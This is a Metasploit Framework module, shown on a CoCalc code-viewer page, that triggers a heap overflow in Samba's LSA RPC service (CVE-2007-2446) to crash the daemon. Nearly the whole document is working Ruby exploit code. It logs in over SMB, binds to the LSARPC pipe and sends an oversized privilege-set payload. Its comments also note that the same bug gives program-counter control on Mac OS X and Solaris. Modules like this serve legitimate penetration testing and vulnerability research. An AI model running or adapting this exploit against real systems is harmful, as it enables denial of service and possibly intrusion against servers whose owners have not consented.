CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb
Views: 11655
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::DCERPC

8
  include Msf::Exploit::Remote::SMB::Client

9
  include Msf::Auxiliary::Dos

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'Samba lsa_io_privilege_set Heap Overflow',

14
      'Description'    => %q{

15
        This module triggers a heap overflow in the LSA RPC service

16
      of the Samba daemon.

17
      },

18
      'Author'         => [ 'hdm' ],

19
      'License'        => MSF_LICENSE,

20
      'References'     =>

21
        [

22
          ['CVE', '2007-2446'],

23
          ['OSVDB', '34699'],

24
        ]

25
      ))

26


27
    register_options(

28
      [

29
        OptString.new('SMBPIPE', [ true,  "The pipe name to use", 'LSARPC']),

30
      ])

31


32
  end

33


34
  def run

35


36
    pipe = datastore['SMBPIPE'].downcase

37


38
    print_status("Connecting to the SMB service...")

39
    connect()

40
    smb_login()

41


42
    datastore['DCERPC::fake_bind_multi'] = false

43


44
    handle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', ["\\#{pipe}"])

45
    print_status("Binding to #{handle} ...")

46
    dcerpc_bind(handle)

47
    print_status("Bound to #{handle} ...")

48


49
    # Linux: Needs heap magic to work around glibc (or TALLOC mode for 3.0.20+)

50
    # Mac OS X: PC control via memcpy to stack ptr

51
    # Solaris: PC control via memcpy to stack ptr

52


53
    stub = lsa_open_policy(dcerpc)

54
    stub << NDR.long(1)

55
    stub << NDR.long(0xffffffff)

56
    stub << NDR.long(0x100)

57
    stub << "X" * 0x100

58


59
    print_status("Calling the vulnerable function...")

60


61
    begin

62
      # LsarAddPrivilegesToAccount

63
      dcerpc.call(0x13, stub)

64
    rescue Rex::Proto::DCERPC::Exceptions::NoResponse

65
      print_good('Server did not respond, this is expected')

66
    rescue => e

67
      if e.to_s =~ /STATUS_PIPE_DISCONNECTED/

68
        print_good('Server disconnected, this is expected')

69
      else

70
        raise e

71
      end

72
    end

73


74
    disconnect

75
  end

76
end

77


78